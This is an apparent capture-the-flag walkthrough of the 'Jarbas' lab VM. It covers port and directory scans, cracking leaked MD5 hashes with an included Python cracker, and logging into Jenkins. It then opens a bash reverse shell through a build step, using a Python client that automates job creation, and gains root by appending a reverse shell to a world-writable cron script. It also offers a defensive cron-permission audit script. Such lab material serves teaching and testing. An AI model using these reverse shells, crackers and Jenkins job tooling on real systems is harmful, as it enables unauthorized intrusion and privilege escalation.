JARBAS

Host discovery

└─$ sudo nmap -sn 10.10.10.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 02:36 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00019s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00022s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.130
Host is up (0.00052s latency).
MAC Address: 00:0C:29:9B:D1:28 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:E5:45:76 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.95 seconds

Port scan (all TCP ports)

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.130 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 02:37 EDT
Nmap scan report for 10.10.10.130
Host is up (0.00076s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:9B:D1:28 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds

TCP service and OS detection

└─$ sudo nmap -sT -sV -sC -O -p22,80,3306,8080 10.10.10.130 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 02:39 EDT
Nmap scan report for 10.10.10.130
Host is up (0.00042s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Jarbas - O Seu Mordomo Virtual!
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
MAC Address: 00:0C:29:9B:D1:28 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.73 seconds

UDP (top 20 ports)

Note on the command below: the -oA flag was left out before nmapscan/udp, so Nmap warns that it cannot parse that argument as a target. The scan of 10.10.10.130 itself still ran; nothing of interest is open over UDP.

└─$ sudo nmap -sU --top-ports 20 10.10.10.130 nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 02:40 EDT
Unable to split netmask from target expression: "nmapscan/udp"
Nmap scan report for 10.10.10.130
Host is up (0.00042s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:9B:D1:28 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.50 seconds

Nmap vulnerability scripts

└─$ sudo nmap --script=vuln -p22,80,3306,8080 10.10.10.130 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 02:42 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.130
Host is up (0.00032s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum:
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:9B:D1:28 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 62.15 seconds

Attack plan

First try MySQL with an empty root password. The server refuses the connection by client host (ERROR 1130) before any password is checked, so 3306 is a dead end from the attacking machine:

└─$ mysql -h 10.10.10.130 -u root -p
Enter password:
ERROR 1130 (HY000): Host '10.10.10.128' is not allowed to connect to this MariaDB server

Web

Visit ports 80 and 8080, and fetch robots.txt from the Jetty service on 8080:

└─$ curl http://10.10.10.130:8080/robots.txt
# we don't want robots to click "build" links
User-agent: *
Disallow: /
  • 80 is the public site (Apache/PHP).
  • 8080 is a login page. The robots.txt comment about "build" links is the one Jenkins ships, so the Jetty service on 8080 is a Jenkins instance.
  • "build" is the lead: with a valid login, a Jenkins job can run arbitrary commands on the host.

Directory brute force on port 80

└─$ sudo gobuster dir -u http://10.10.10.130 --wordlist=/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.130
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/17 02:56:42 Starting gobuster in directory enumeration mode
===============================================================
Progress: 21985 / 62285 (35.30%)[ERROR] 2023/07/17 02:56:46 [!] parse "http://10.10.10.130/error\x1f_log": net/url: invalid control character in URL
Progress: 60496 / 62285 (97.13%)
===============================================================
2023/07/17 02:56:52 Finished
===============================================================

No directories were found, so rerun with file extensions (php, html):

└─$ sudo gobuster dir -u http://10.10.10.130 --wordlist=/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.130
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
2023/07/17 02:59:17 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 32808]
/access.html          (Status: 200) [Size: 359]
/.html                (Status: 403) [Size: 207]
Progress: 67581 / 186855 (36.17%)[ERROR] 2023/07/17 02:59:28 [!] parse "http://10.10.10.130/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/07/17 02:59:28 [!] parse "http://10.10.10.130/besalu\t.php": net/url: invalid control character in URL
Progress: 70823 / 186855 (37.90%)[ERROR] 2023/07/17 02:59:28 [!] parse "http://10.10.10.130/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/07/17 02:59:28 [!] parse "http://10.10.10.130/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2023/07/17 02:59:28 [!] parse "http://10.10.10.130/error\x1f_log.html": net/url: invalid control character in URL
/.html                (Status: 403) [Size: 207]
/index.html           (Status: 200) [Size: 32808]
/.html                (Status: 403) [Size: 207]
Progress: 186306 / 186855 (99.71%)
===============================================================
2023/07/17 02:59:46 Finished
===============================================================

Visit /access.html.

It contains three username:hash pairs:

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

Identify the hash type (32 hex characters, so most likely unsalted MD5):

└─$ hash-identifier '5978a63b4654c73c60fa24f836386d87'
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Crack them against a wordlist. The recovered plaintexts:

tiago:5978a63b4654c73c60fa24f836386d87->italia99
trindade:f463f63616cb3f1e81ce46b39f882fd5->marianna
eder:9b38e2b1e8b12f426b0d208a7ab6cb98->vipsu
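The cracking step above is shown only as its result. The following is an added example, not code from this page, that does the same job offline: parse the user:hash lines from access.html, hash every wordlist candidate once with unsalted MD5 (the first guess from hash-identifier) and look it up against all targets. The three hash lines are copied from this page; the wordlist path in the __main__ block is an assumption.

```python
import hashlib

# Constructed input: the three username:hash lines recovered from
# /access.html on the target, exactly as shown above on this page.
ACCESS_HTML_LINES = """\
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
"""


def md5_hex(candidate: str) -> str:
    """Unsalted MD5 of the UTF-8 bytes of a candidate password, lowercase hex."""
    return hashlib.md5(candidate.encode("utf-8")).hexdigest()


def parse_user_hash_lines(text: str) -> dict:
    """Parse 'user:hash' lines into {user: hash}.

    Only 32-character hex digests are accepted (the length of MD5 and of the
    DCC format hash-identifier also suggested); anything else, such as a
    stray HTML fragment, is dropped so it cannot pollute the crack list.
    """
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        user, digest = line.split(":", 1)
        digest = digest.strip().lower()
        if len(digest) == 32 and all(c in "0123456789abcdef" for c in digest):
            creds[user.strip()] = digest
    return creds


def crack_md5(creds: dict, wordlist) -> dict:
    """Return {user: password} for every hash matched by a wordlist entry.

    Each candidate is hashed once and looked up against all remaining
    targets, so the cost is one MD5 per wordlist line no matter how many
    hashes are being attacked. Stops early once every hash is cracked.
    """
    remaining = {digest: user for user, digest in creds.items()}
    found = {}
    for word in wordlist:
        if not remaining:
            break
        word = word.rstrip("\r\n")
        user = remaining.pop(md5_hex(word), None)
        if user is not None:
            found[user] = word
    return found


def demo(wordlist) -> dict:
    """Run the attack against the page's three hashes with any iterable of candidates."""
    return crack_md5(parse_user_hash_lines(ACCESS_HTML_LINES), wordlist)


if __name__ == "__main__":
    import sys
    # Assumed wordlist location; pass another path as the first argument.
    path = sys.argv[1] if len(sys.argv) > 1 else "/usr/share/wordlists/rockyou.txt"
    with open(path, encoding="latin-1", errors="ignore") as fh:
        for user, password in demo(fh).items():
            print(f"{user}:{password}")
```

With a wordlist that contains the three passwords this prints the same user:password lines listed above. The equivalent with hashcat, which also handles the user prefix, is hashcat -m 0 --username hashes.txt rockyou.txt (mode 0 is raw MD5).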

Try the recovered credentials against the Jenkins login on port 8080.

  • eder:vipsu logs in successfully.

Create a new job whose build step is a bash reverse shell:

/bin/bash -i >& /dev/tcp/10.10.10.128/4321 0>&1

Start a listener on the attacking machine (nc -lvnp 4321), click Build Now, and the reverse shell connects back as the Jenkins service account.
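The same job creation and build can be driven over Jenkins' HTTP API instead of the web form. This is an added example, not code from this page or from the Jenkins project. It takes the target (10.10.10.130:8080), the login (eder:vipsu) and the listener address from this walkthrough; the job name "cleanup" and the use of a freestyle job with an "Execute shell" build step are assumptions. The detail worth seeing is that the payload contains >&, which must be XML-escaped inside config.xml; building the document with ElementTree does that, where a hand-written string template would produce a config Jenkins rejects.

```python
import base64
import json
import urllib.error
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Listener used on this page for the first shell (attacker 10.10.10.128:4321).
PAYLOAD = "/bin/bash -i >& /dev/tcp/10.10.10.128/4321 0>&1"


def freestyle_shell_config(command: str, description: str = "") -> bytes:
    """config.xml for a freestyle job whose only build step is 'Execute shell'.

    Built with ElementTree so that '>', '&' and '<' in the command are escaped
    as XML requires; '>&' in the bash redirection would otherwise corrupt the
    document.
    """
    project = ET.Element("project")
    ET.SubElement(project, "description").text = description
    ET.SubElement(project, "keepDependencies").text = "false"
    ET.SubElement(project, "canRoam").text = "true"
    ET.SubElement(project, "disabled").text = "false"
    builders = ET.SubElement(project, "builders")
    shell = ET.SubElement(builders, "hudson.tasks.Shell")
    ET.SubElement(shell, "command").text = command
    return ET.tostring(project, encoding="utf-8", xml_declaration=True)


def config_command(config_xml: bytes) -> str:
    """Parse a config.xml back and return the command of its shell build step ('' if none)."""
    root = ET.fromstring(config_xml)
    for shell in root.iter("hudson.tasks.Shell"):
        return shell.findtext("command") or ""
    return ""


class Jenkins:
    """Minimal client: basic auth, CSRF crumb, create job, trigger build."""

    def __init__(self, base_url: str, user: str, password: str):
        self.base = base_url.rstrip("/")
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        self.headers = {"Authorization": "Basic " + token}
        # The crumb is bound to the session that issued it, so keep cookies
        # across requests or Jenkins answers 403 on the POSTs.
        self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())

    def _request(self, path: str, data: bytes = None, content_type: str = None):
        req = urllib.request.Request(self.base + path, data=data, headers=dict(self.headers))
        if content_type:
            req.add_header("Content-Type", content_type)
        with self.opener.open(req) as resp:   # data != None makes this a POST
            return resp.status, resp.read()

    def fetch_crumb(self) -> None:
        try:
            _, body = self._request("/crumbIssuer/api/json")
        except urllib.error.HTTPError as err:
            if err.code == 404:               # CSRF protection disabled: no crumb needed
                return
            raise
        info = json.loads(body)
        self.headers[info["crumbRequestField"]] = info["crumb"]

    def create_job(self, name: str, config_xml: bytes) -> int:
        path = "/createItem?name=" + urllib.parse.quote(name)
        return self._request(path, data=config_xml, content_type="text/xml")[0]

    def build(self, name: str) -> int:
        # Empty POST body; Jenkins answers 201 and queues the build.
        return self._request(f"/job/{urllib.parse.quote(name)}/build", data=b"")[0]


if __name__ == "__main__":
    jenkins = Jenkins("http://10.10.10.130:8080", "eder", "vipsu")
    jenkins.fetch_crumb()
    jenkins.create_job("cleanup", freestyle_shell_config(PAYLOAD, "assumed job name"))
    jenkins.build("cleanup")
```

Run the listener first; the build step executes the command as the user the Jenkins service runs under, which the next section shows is jenkins.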

Host enumeration

bash-4.2$ whoami
whoami
jenkins
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ ifconfig
ifconfig
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
bash-4.2$
  • sudo -l could not prompt for a password (no tty), so it says nothing either way about sudo rights; ifconfig printed nothing because /sbin is not on the jenkins user's PATH
  • root and eder have login shells; jenkins has /bin/false
  • /etc/shadow is not readable

Check scheduled jobs

bash-4.2$ cat /etc/cron.d
cat /etc/cron.d
cat: /etc/cron.d: Is a directory
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$
bash-4.2$ ls -l /etc/script/CleaningScript.sh
ls -l /etc/script/CleaningScript.sh
-rwxrwxrwx. 1 root root 50 Apr  1  2018 /etc/script/CleaningScript.sh
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
bash-4.2$
  • The job runs as root every five minutes, and the script it runs is world-writable (rwxrwxrwx), so any local user can add commands to it
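The check done by hand above (read /etc/crontab, find the root job, ls -l its script) is worth automating, because the same flaw can hide in any of /etc/cron.d/*. The block below is an added example, not code from this page: it parses system-crontab syntax, takes the first word of each root job's command as the program cron will execute, and decides from the mode bits whether the current uid/gids could modify it. Mode bits are used instead of os.access on purpose: os.access answers yes to everything when run as root, which would hide the finding on a host you audit as an administrator. The demo builds a temporary copy of this page's situation (a 0777 script beside a 0755 one); the crontab line is copied from the page, uid 997 / gid 995 are the jenkins user and group from /etc/passwd above.

```python
import os
import shlex
import stat
import tempfile

# The root job found in /etc/crontab on the target (copied from this page).
PAGE_CRONTAB_LINE = "*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1"


def parse_system_crontab(text: str) -> list:
    """Return (user, command) pairs from system-crontab syntax.

    /etc/crontab and /etc/cron.d/* carry a user field after the five time
    fields (a per-user crontab from 'crontab -l' does not). Comments, blank
    lines and VAR=value lines are skipped; '@reboot'-style jobs are handled.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        head = line.split(None, 1)[0]
        if "=" in head:                      # SHELL=, PATH=, MAILTO=
            continue
        n = 1 if head.startswith("@") else 5  # time fields before the user
        fields = line.split(None, n + 1)
        if len(fields) < n + 2:
            continue
        jobs.append((fields[n], fields[n + 1]))
    return jobs


def executable_of(command: str) -> str:
    """First word of the job command, i.e. the program cron will run."""
    try:
        return shlex.split(command)[0]
    except (ValueError, IndexError):
        return ""


def writable_by(st: os.stat_result, uid: int, gids) -> bool:
    """Can uid (member of gids) write this file, judged from the mode bits only?"""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def writable_root_jobs(crontab_text: str, uid: int, gids, stat_fn=os.stat) -> list:
    """Absolute paths of programs run by root jobs that uid/gids could modify."""
    hits = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        path = executable_of(command)
        if not path.startswith("/"):
            continue                         # resolved through cron's PATH; out of scope here
        try:
            st = stat_fn(path)
        except OSError:
            continue                         # dangling entry; a different finding
        if writable_by(st, uid, gids):
            hits.append(path)
    return hits


def demo() -> list:
    """Constructed reproduction of the page's finding in a temp directory."""
    d = tempfile.mkdtemp()
    bad = os.path.join(d, "CleaningScript.sh")   # 0777, like the target
    good = os.path.join(d, "backup.sh")          # 0755, the correct state
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(path, mode)
    crontab = (
        "SHELL=/bin/bash\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\n"
        "# Example of job definition:\n"
        f"*/5 * * * * root {bad} >/dev/null 2>&1\n"
        f"0 3 * * * root {good}\n"
        f"@reboot jenkins {bad}\n"            # not a root job: ignored
    )
    return [os.path.basename(p) for p in writable_root_jobs(crontab, 997, {995})]


if __name__ == "__main__":
    print(demo())
    # On a real host: audit /etc/crontab and every file in /etc/cron.d as the current user.
    for f in ["/etc/crontab"] + [os.path.join("/etc/cron.d", x) for x in os.listdir("/etc/cron.d")]:
        with open(f) as fh:
            for hit in writable_root_jobs(fh.read(), os.getuid(), set(os.getgroups())):
                print(f"{f}: root job runs writable {hit}")
```

The fix on the target side is the mirror image of the check: the script must be owned by root and not writable by group or others (chmod 755 at most), and the same applies to its parent directory.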

Privilege escalation through the cron job

Append a reverse shell to the script and start a second listener (nc -lvnp 1234 on the attacking machine):

bash-4.2$ echo "/bin/bash -i >& /dev/tcp/10.10.10.128/1234 0>&1" >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/10.10.10.128/1234 0>&1" >> /etc/script/CleaningScript.sh
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
/bin/bash -i >& /dev/tcp/10.10.10.128/1234 0>&1
bash-4.2$

Within five minutes the job fires and the listener receives a root shell:

└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.130] 44504
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs
[root@jarbas ~]#